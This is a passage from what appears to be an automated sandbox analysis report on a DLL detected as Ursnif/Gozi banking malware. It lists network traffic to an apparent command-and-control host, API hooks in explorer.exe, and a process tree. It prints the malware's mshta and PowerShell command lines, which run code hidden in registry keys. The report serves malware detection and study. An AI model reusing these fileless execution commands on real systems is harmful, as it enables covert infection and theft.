                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
                                                                                Host: api3.lepini.at
                                                                                Feb 16, 2021 00:59:08.940006018 CET8849INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:59:08 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                X-Content-Type-Options: nosniff
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                HTTPS Packets

                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                Feb 16, 2021 00:57:34.812472105 CET104.20.184.68443192.168.2.449746CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                Feb 16, 2021 00:57:34.844383001 CET104.20.184.68443192.168.2.449747CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                Feb 16, 2021 00:57:39.578773975 CET151.101.1.44443192.168.2.449764CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                Feb 16, 2021 00:57:39.584134102 CET151.101.1.44443192.168.2.449763CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                Feb 16, 2021 00:57:39.584671021 CET151.101.1.44443192.168.2.449759CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                Feb 16, 2021 00:57:39.585233927 CET151.101.1.44443192.168.2.449760CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                Feb 16, 2021 00:57:39.601056099 CET151.101.1.44443192.168.2.449761CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                Feb 16, 2021 00:57:39.601790905 CET151.101.1.44443192.168.2.449762CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030

                                                                                Code Manipulations

                                                                                User Modules

                                                                                Hook Summary

                                                                                Function NameHook TypeActive in Processes
                                                                                api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                                                api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe
                                                                                CreateProcessAsUserWEATexplorer.exe
                                                                                CreateProcessAsUserWINLINEexplorer.exe
                                                                                CreateProcessWEATexplorer.exe
                                                                                CreateProcessWINLINEexplorer.exe
                                                                                CreateProcessAEATexplorer.exe
                                                                                CreateProcessAINLINEexplorer.exe

                                                                                Processes

                                                                                Process: explorer.exe, Module: user32.dll
                                                                                Function NameHook TypeNew Data
                                                                                api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFABB035200
                                                                                api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT4DA719C
                                                                                Process: explorer.exe, Module: KERNEL32.DLL
                                                                                Function NameHook TypeNew Data
                                                                                CreateProcessAsUserWEAT7FFABB03521C
                                                                                CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                CreateProcessWEAT7FFABB035200
                                                                                CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                CreateProcessAEAT7FFABB03520E
                                                                                CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                Process: explorer.exe, Module: WININET.dll
                                                                                Function NameHook TypeNew Data
                                                                                api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFABB035200
                                                                                api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT4DA719C

                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                Analysis Process: loaddll32.exe PID: 5576 Parent PID: 5812

                                                                                General

                                                                                Start time:00:57:28
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\loaddll32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll'
                                                                                Imagebase:0x870000
                                                                                File size:121856 bytes
                                                                                MD5 hash:8081BC925DFC69D40463079233C90FA5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                Chronological Activities

                                                                                Analysis Process: regsvr32.exe PID: 5876 Parent PID: 5576

                                                                                General

                                                                                Start time:00:57:28
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll
                                                                                Imagebase:0x1280000
                                                                                File size:20992 bytes
                                                                                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                Reputation:high

                                                                                Chronological Activities

                                                                                Analysis Process: cmd.exe PID: 1440 Parent PID: 5576

                                                                                General

                                                                                Start time:00:57:29
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
                                                                                Imagebase:0x11d0000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Chronological Activities

                                                                                Analysis Process: iexplore.exe PID: 1380 Parent PID: 1440

                                                                                General

                                                                                Start time:00:57:29
                                                                                Start date:16/02/2021
                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                Imagebase:0x7ff7979a0000
                                                                                File size:823560 bytes
                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Chronological Activities

                                                                                Analysis Process: iexplore.exe PID: 6192 Parent PID: 1380

                                                                                General

                                                                                Start time:00:57:30
                                                                                Start date:16/02/2021
                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17410 /prefetch:2
                                                                                Imagebase:0x250000
                                                                                File size:822536 bytes
                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Chronological Activities

                                                                                Analysis Process: iexplore.exe PID: 6552 Parent PID: 1380

                                                                                General

                                                                                Start time:00:58:07
                                                                                Start date:16/02/2021
                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82962 /prefetch:2
                                                                                Imagebase:0x250000
                                                                                File size:822536 bytes
                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Chronological Activities

                                                                                Analysis Process: iexplore.exe PID: 6864 Parent PID: 1380

                                                                                General

                                                                                Start time:00:58:12
                                                                                Start date:16/02/2021
                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17422 /prefetch:2
                                                                                Imagebase:0x250000
                                                                                File size:822536 bytes
                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Chronological Activities

                                                                                Analysis Process: iexplore.exe PID: 6940 Parent PID: 1380

                                                                                General

                                                                                Start time:00:58:15
                                                                                Start date:16/02/2021
                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82978 /prefetch:2
                                                                                Imagebase:0x250000
                                                                                File size:822536 bytes
                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Chronological Activities

                                                                                Analysis Process: mshta.exe PID: 492 Parent PID: 3424

                                                                                General

                                                                                Start time:00:58:23
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\mshta.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
                                                                                Imagebase:0x7ff71e320000
                                                                                File size:14848 bytes
                                                                                MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000016.00000003.789528617.000001F2CB9EF000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                Reputation:moderate

                                                                                Chronological Activities

                                                                                Analysis Process: powershell.exe PID: 5424 Parent PID: 492

                                                                                General

                                                                                Start time:00:58:25
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
                                                                                Imagebase:0x7ff7bedd0000
                                                                                File size:447488 bytes
                                                                                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, Author: CCN-CERT
                                                                                Reputation:high

                                                                                Chronological Activities

                                                                                Analysis Process: conhost.exe PID: 5428 Parent PID: 5424

                                                                                General

                                                                                Start time:00:58:25
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff724c50000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Chronological Activities

                                                                                Analysis Process: csc.exe PID: 4136 Parent PID: 5424

                                                                                General

                                                                                Start time:00:58:32
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
                                                                                Imagebase:0x7ff696a20000
                                                                                File size:2739304 bytes
                                                                                MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Reputation:moderate

                                                                                Chronological Activities

                                                                                Analysis Process: cvtres.exe PID: 5732 Parent PID: 4136

                                                                                General

                                                                                Start time:00:58:34
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP'
                                                                                Imagebase:0x7ff768940000
                                                                                File size:47280 bytes
                                                                                MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Chronological Activities

                                                                                Analysis Process: csc.exe PID: 6124 Parent PID: 5424

                                                                                General

                                                                                Start time:00:58:37
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
                                                                                Imagebase:0x7ff696a20000
                                                                                File size:2739304 bytes
                                                                                MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                Chronological Activities

                                                                                Analysis Process: cvtres.exe PID: 2920 Parent PID: 6124

                                                                                General

                                                                                Start time:00:58:38
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP'
                                                                                Imagebase:0x7ff768940000
                                                                                File size:47280 bytes
                                                                                MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Chronological Activities

                                                                                Analysis Process: explorer.exe PID: 3424 Parent PID: 5424

                                                                                General

                                                                                Start time:00:58:44
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\explorer.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:
                                                                                Imagebase:0x7ff6fee60000
                                                                                File size:3933184 bytes
                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, Author: CCN-CERT
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                Chronological Activities

                                                                                Analysis Process: control.exe PID: 5528 Parent PID: 5876

                                                                                General

                                                                                Start time:00:58:44
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\control.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\control.exe -h
                                                                                Imagebase:0x7ff635e60000
                                                                                File size:117760 bytes
                                                                                MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, Author: CCN-CERT
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                Chronological Activities

                                                                                Analysis Process: RuntimeBroker.exe PID: 3656 Parent PID: 3424

                                                                                General

                                                                                Start time:00:58:52
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:
                                                                                Imagebase:0x7ff6b0ff0000
                                                                                File size:99272 bytes
                                                                                MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                Chronological Activities

                                                                                Analysis Process: rundll32.exe PID: 6488 Parent PID: 5528

                                                                                General

                                                                                Start time:00:58:52
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                                                Imagebase:0x7ff6c5cf0000
                                                                                File size:69632 bytes
                                                                                MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, Author: CCN-CERT
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                Chronological Activities

                                                                                Analysis Process: RuntimeBroker.exe PID: 4268 Parent PID: 3424

                                                                                General

                                                                                Start time:00:58:56
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:
                                                                                Imagebase:0x7ff6b0ff0000
                                                                                File size:99272 bytes
                                                                                MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                Chronological Activities

                                                                                Analysis Process: RuntimeBroker.exe PID: 4772 Parent PID: 3424

                                                                                General

                                                                                Start time:00:59:00
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:
                                                                                Imagebase:0x7ff6b0ff0000
